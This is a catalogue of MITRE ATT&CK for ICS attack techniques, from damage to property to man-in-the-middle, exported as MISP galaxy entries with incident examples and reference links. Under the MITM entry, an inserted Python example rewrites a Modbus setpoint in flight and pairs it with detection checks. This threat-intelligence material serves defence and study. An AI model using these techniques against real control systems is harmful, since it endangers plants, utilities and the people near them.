Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in Loss of Safety. Operations that result in Loss of Control may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of Loss of Productivity and Revenue. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under the "incidents affecting business" section of its 2014 IT Security Report. These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community’s now blackened rivers. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside.

The tag is: misp-galaxy:mitre-ics-techniques="Damage to Property"

Table 6933. Table References

Links

https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Data Destruction

Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident. Standard file deletion commands are available on most operating systems and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.

The tag is: misp-galaxy:mitre-ics-techniques="Data Destruction"

Table 6934. Table References

Links

https://attack.mitre.org/wiki/Technique/T1107

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Historian Compromise

Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. Dragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution. The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include references to a Microsoft Windows Server 2003 host with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be expected to have extensive connections within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.

The tag is: misp-galaxy:mitre-ics-techniques="Data Historian Compromise"

Table 6935. Table References

Links

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

Data from Information Repositories

Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of target information repositories include reference databases and local machines on the process environment.

The tag is: misp-galaxy:mitre-ics-techniques="Data from Information Repositories"

Table 6936. Table References

Links

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

https://www.symantec.com/security-center/writeup/2012-052811-0308-99

Default Credentials

Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. Default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.

The tag is: misp-galaxy:mitre-ics-techniques="Default Credentials"

Table 6937. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Denial of Control

Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network, preventing them from issuing any controls.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of Control"

Table 6938. Table References

Links

https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf

https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297

https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Denial of Service

Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through Control Device Identification. There are examples of adversaries remotely causing a Device Restart/Shutdown by exploiting a vulnerability that induces uncontrolled resource consumption. In the Maroochy attack, the adversary was able to shut an investigator out of the network.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of Service"

Table 6939. Table References

Links

https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A

https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

http://cwe.mitre.org/data/definitions/400.html

https://nvd.nist.gov/vuln/detail/CVE-2015-5374

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

Denial of View

Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment’s data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network, preventing them from viewing the state of the system.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of View"

Table 6940. Table References

Links

https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf

https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297

https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

Detect Operating Mode

Adversaries may gather information about the current operating state of a PLC. CPU operating modes are often controlled by a key switch on the PLC. Example states may be run, prog, stop, remote, and invalid. Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC.

The tag is: misp-galaxy:mitre-ics-techniques="Detect Operating Mode"

Table 6941. Table References

Links

Triton contains a file named TS_cnames.py which contains default definitions for key state (TS_keystate). Key state is referenced in TsHi.py.

Detect Program State

Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it’s running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.

The tag is: misp-galaxy:mitre-ics-techniques="Detect Program State"

Table 6942. Table References

Links

https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library

Device Restart/Shutdown

Adversaries may forcibly restart or shut down a device in the ICS environment to disrupt and potentially cause adverse effects on the physical processes it helps to control. Methods of device restart and shutdown exist as built-in, standard functionalities. This can include interactive device web interfaces, CLIs, and network protocol commands, among others. Device restart or shutdown may also occur as a consequence of changing a device into an alternative mode of operation for testing or firmware loading. Unexpected restart or shutdown of control system devices may contribute to impact, by preventing expected response functions from activating and being received in critical states. This can also be a sign of malicious device modification, as many updates require a shutdown in order to take effect. For example, DNP3’s function code 0x0D can reset and reconfigure DNP3 outstations by forcing them to perform a complete power cycle. In the 2015 attack on the Ukrainian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries scheduled disconnects for the uninterruptible power supply (UPS) systems so that when power was disconnected from the substations, the devices would shut down and service could not be recovered.

The tag is: misp-galaxy:mitre-ics-techniques="Device Restart/Shutdown"

Table 6943. Table References

Links

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Drive-by Compromise

Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user’s web browser is targeted and exploited simply by visiting the compromised website. The adversary may target a specific community, such as trusted third party suppliers or other industry-specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. The National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.

The tag is: misp-galaxy:mitre-ics-techniques="Drive-by Compromise"

Table 6944. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-074A

https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.cyberviser.com/2018/05/group-linked-to-shamoon-attacks-targeting-ics-networks-in-middle-east-and-uk/

https://www.cyberscoop.com/xenotime-ics-cyber-attacks-trisis-dragos/

https://securelist.com/bad-rabbit-ransomware/82851/

Engineering Workstation Compromise

Adversaries may compromise and gain control of an engineering workstation as an Initial Access technique into the control system environment. Access to an engineering workstation may occur as a result of remote access or by physical means, such as a person with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks, for example unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to and control of other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.

The tag is: misp-galaxy:mitre-ics-techniques="Engineering Workstation Compromise"

Table 6945. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Execution through API

Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software, such as Change Program State of a program on a PLC.

The tag is: misp-galaxy:mitre-ics-techniques="Execution through API"

Table 6946. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Exploit Public-Facing Application

Adversaries may attempt to exploit public-facing applications to leverage weaknesses on Internet-facing computer systems, programs, or assets in order to cause unintended or unexpected behavior. These public-facing applications may include user interfaces, software, data, or commands. In particular, a public-facing application in the IT environment may provide adversaries an interface into the OT environment. ICS-CERT analysis has identified the probable initial infection vector for systems running GE’s Cimplicity HMI with a direct connection to the Internet.

The tag is: misp-galaxy:mitre-ics-techniques="Exploit Public-Facing Application"

Table 6947. Table References

Links

https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

Exploitation for Evasion

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. Adversaries may have prior knowledge through Control Device Identification about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious System Firmware.

The tag is: misp-galaxy:mitre-ics-techniques="Exploitation for Evasion"

Table 6948. Table References

Links

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://ics-cert.us-cert.gov/advisories/ICSA-18-107-02

https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s

https://nvd.nist.gov/vuln/detail/CVE-2018-8872

https://cwe.mitre.org/data/definitions/119.html

https://www.nrc.gov/docs/ML1209/ML120900890.pdf

Exploitation of Remote Services

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. ICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (“wormable”) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts.

The tag is: misp-galaxy:mitre-ics-techniques="Exploitation of Remote Services"

Table 6949. Table References

Links

https://attack.mitre.org/techniques/T1210/

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

External Remote Services

Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. In the Maroochy Attack, the adversary was able to gain remote computer access to the system over radio. The 2015 attack on the Ukrainian power grid showed the use of existing remote access tools within the environment to access the control system network. The adversary harvested worker credentials, some of them for VPNs the grid workers used to remotely log into the control system networks. The VPNs into these networks appear to have lacked two-factor authentication.

The tag is: misp-galaxy:mitre-ics-techniques="External Remote Services"

Table 6950. Table References

Links

https://attack.mitre.org/wiki/Technique/T1133

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/

https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

https://dragos.com/blog/trisis/TRISIS-01.pdf

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Graphical User Interface

Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard. If physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine. In the 2015 attack on the Ukrainian power grid, the adversary utilized the GUI of HMIs in the SCADA environment to open breakers.

The tag is: misp-galaxy:mitre-ics-techniques="Graphical User Interface"

Table 6951. Table References

Links

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Hooking

Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for persistent means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process’s IAT, where pointers to imported API functions are stored.

The tag is: misp-galaxy:mitre-ics-techniques="Hooking"

Table 6952. Table References

Links

https://attack.mitre.org/techniques/T1179/

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

I/O Image

Adversaries may seek to capture process image values related to the inputs and outputs of a PLC. Within a PLC all input and output states are stored into an I/O image. This image is used by the user program instead of directly interacting with physical I/O.

The tag is: misp-galaxy:mitre-ics-techniques="I/O Image"

Table 6953. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

I/O Module Discovery

Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that they can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.

The tag is: misp-galaxy:mitre-ics-techniques="I/O Module Discovery"

Table 6954. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Indicator Removal on Host

Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.

The tag is: misp-galaxy:mitre-ics-techniques="Indicator Removal on Host"

Table 6955. Table References

Links

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Internet Accessible Device

Adversaries may gain access into industrial environments directly through systems exposed to the internet for remote access rather than through External Remote Services. Minimal protections provided by these devices such as password authentication may be targeted and compromised. In the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing.

The tag is: misp-galaxy:mitre-ics-techniques="Internet Accessible Device"

Table 6956. Table References

Links

https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf

https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

https://time.com/4270728/iran-cyber-attack-dam-fbi/

https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B

Location Identification

Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries. While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. An adversary's attempt to attack and cause Impact could potentially affect other control system devices in close proximity. Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.

The tag is: misp-galaxy:mitre-ics-techniques="Location Identification"

Table 6957. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01

https://www.f-secure.com/weblog/archives/00002718.html

Loss of Productivity and Revenue

Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. In some cases, this may result from the postponement and disruption of ICS operations and production as part of a remediation effort. Operations may be brought to a halt and effectively stopped in an effort to contain and properly remove malware or due to the Loss of Safety.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Productivity and Revenue"

Table 6960. Table References

Links

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880

https://www.hydro.com/en/media/on-the-agenda/cyber-attack/

https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war

https://www.darkreading.com/attacks-breaches/how-a-manufacturing-firm-recovered-from-a-devastating-ransomware-attack/d/d-id/1334760

Loss of Safety

Adversaries may cause loss of safety whether on purpose or as a consequence of actions taken to accomplish an operation. The loss of safety can describe a physical impact and threat, or the potential for unsafe conditions and activity in terms of control systems environments, devices, or processes. For instance, an adversary may issue commands or influence and possibly inhibit safety mechanisms that allow the injury of and possible loss of life. This can also encompass scenarios resulting in the failure of a safety mechanism or control, that may lead to unsafe and dangerous execution and outcomes of physical processes and related systems. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report. These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact.

The tag is: misp-galaxy:mitre-ics-techniques="Loss of Safety"

Table 6961. Table References

Links

https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf

https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297

https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Man in the Middle

Adversaries with privileged network access may seek to modify network traffic in real time using man-in-the-middle (MITM) attacks. This type of attack allows the adversary to intercept traffic to and/or from a particular device on the network. If a MITM attack is established, then the adversary has the ability to block, log, modify, or inject traffic into the communication stream. There are several ways to accomplish this attack, but some of the most common are Address Resolution Protocol (ARP) poisoning and the use of a proxy. A MITM attack may allow an adversary to perform the following attacks: Block Reporting Message, Modify Parameter, Unauthorized Command Message, Spoof Reporting Message
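
The rewrite-in-flight described above, shown on a Modbus/TCP Write Single Register frame as an added example for this page (it is not code from the MITRE ICS ATT&CK project or from the referenced reports). The register map, the allowed value range, the unit id and the transaction id are assumptions chosen for the example; the MBAP header layout and function code 0x06 follow the Modbus/TCP specification.

```python
"""Modbus/TCP write in flight: build, rewrite on the path, and check.

Constructed example. The HMI sends Write Single Register (function code 0x06)
to unit 1; a man-in-the-middle keeps the header and address and changes only
the value. A monitor with a per-register allowlist catches the out-of-range
write, and comparing captures from both sides of the link reveals the rewrite
itself. Register map and ranges are assumptions for this example.
"""
import struct

FC_WRITE_SINGLE_REGISTER = 0x06

# Constructed register map: unit -> {register address: (min, max) allowed value}
ALLOWED_WRITES = {1: {0x0010: (0, 600)}}   # assumed: a flow setpoint in 0.1 l/s


def build_write_single_register(tid, unit, address, value):
    """MBAP header (transaction id, protocol id 0, length, unit id) + PDU."""
    pdu = struct.pack(">BHH", FC_WRITE_SINGLE_REGISTER, address, value)
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)  # length counts unit id + PDU
    return mbap + pdu


def parse_modbus_tcp(frame):
    """Decode MBAP and the PDU of a single-register write; reject malformed frames."""
    if len(frame) < 8:
        raise ValueError("frame too short")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        raise ValueError("malformed MBAP header")
    msg = {"tid": tid, "unit": unit, "fc": frame[7]}
    if msg["fc"] == FC_WRITE_SINGLE_REGISTER:
        msg["address"], msg["value"] = struct.unpack(">HH", frame[8:12])
    return msg


def mitm_rewrite(frame, new_value):
    """What an on-path adversary does: same transaction, same register, different value."""
    msg = parse_modbus_tcp(frame)
    return build_write_single_register(msg["tid"], msg["unit"], msg["address"], new_value)


def check_write(frame):
    """Allowlist check a passive monitor on the PLC-side span port would apply."""
    msg = parse_modbus_tcp(frame)
    if msg["fc"] != FC_WRITE_SINGLE_REGISTER:
        return []
    bounds = ALLOWED_WRITES.get(msg["unit"], {}).get(msg["address"])
    if bounds is None:
        return [f"unit {msg['unit']}: write to unexpected register {msg['address']:#06x}"]
    lo, hi = bounds
    if not lo <= msg["value"] <= hi:
        return [f"unit {msg['unit']}: register {msg['address']:#06x} = {msg['value']} outside {lo}..{hi}"]
    return []


def frames_differ(hmi_side, plc_side):
    """Captures taken on both sides of the segment should match byte for byte;
    any difference for the same transaction id is the rewrite itself."""
    a, b = parse_modbus_tcp(hmi_side), parse_modbus_tcp(plc_side)
    return a["tid"] == b["tid"] and hmi_side != plc_side


if __name__ == "__main__":
    sent = build_write_single_register(tid=7, unit=1, address=0x0010, value=300)
    seen = mitm_rewrite(sent, 900)
    print(sent.hex(), "->", seen.hex())
    print(check_write(sent), check_write(seen))
    print(frames_differ(sent, seen))
```

The allowlist check only works when a monitor sits on the PLC side of the adversary; a sensor on the HMI side sees the legitimate frame. Where both sides can be tapped, the byte comparison on matching transaction ids is the more direct detection, and it also catches rewrites whose values stay inside the allowed range.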

The tag is: misp-galaxy:mitre-ics-techniques="Man in the Middle"

Table 6963. Table References

Links

https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://dragos.com/resource/hexane/

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Manipulate I/O Image

